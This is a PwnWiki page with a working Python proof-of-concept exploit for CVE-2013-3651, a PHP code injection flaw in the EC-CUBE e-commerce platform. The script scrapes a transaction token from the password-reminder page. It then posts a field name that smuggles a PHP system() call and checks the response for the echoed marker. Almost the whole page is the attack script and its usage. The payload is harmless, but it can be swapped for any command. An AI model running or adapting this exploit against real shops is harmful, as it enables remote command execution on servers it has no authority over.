CVE-2013-3651 LOCKON EC-CUBE 2.11.2 through 2.12.4 PHP代碼注入漏洞

From PwnWiki
Revision as of 10:52, 6 April 2021 by Pwnwiki (talk | contribs) (Created page with "==Usage== <pre> $ python poc_cve_2013_3651.py <Target URL> - e.g. $ python poc_cve_2013_3651.py http://127.0.0.1:9000/ Result: Vulnerable! </pre> ==POC== <pre> import re im...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

Usage

$ python poc_cve_2013_3651.py <Target URL>

- e.g.
$ python poc_cve_2013_3651.py http://127.0.0.1:9000/
Result: Vulnerable!


POC

import re
import urllib.request
import sys

args = sys.argv

if len(args) != 2 :
    print ('Using: python poc_cve_2013_3651.py <Target URL>')
    exit()


opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor())
url = '%s/forgot/' % args[1]

# Get transaction value.
req = urllib.request.Request(url)
res = opener.open(req)
body = res.read().decode('utf-8')
res.close()
transactionid = re.findall(r' name="transactionid" value="([a-z0-9]+)"', body)[0]

# Post Check request.
post_data = urllib.parse.urlencode({
    'transactionid': transactionid,
    'mode': 'mail_check',
    'email': '',
    "name01[system('echo CVE$1_2013_3651')]": '',
    'name02': ''
}).encode('utf-8')

res = opener.open(req, post_data)
body = res.read().decode('utf-8')
res.close()

# print (body)
if re.findall(r'CVE_2013_3651', body) :
    print('Result: Vulnerable!')
else:
    print('Result: Not vulnerable...')
Retrieved from "https://pwnwiki.com/index.php?title=CVE-2013-3651_LOCKON_EC-CUBE_2.11.2_through_2.12.4_PHP代碼注入漏洞&oldid=1022"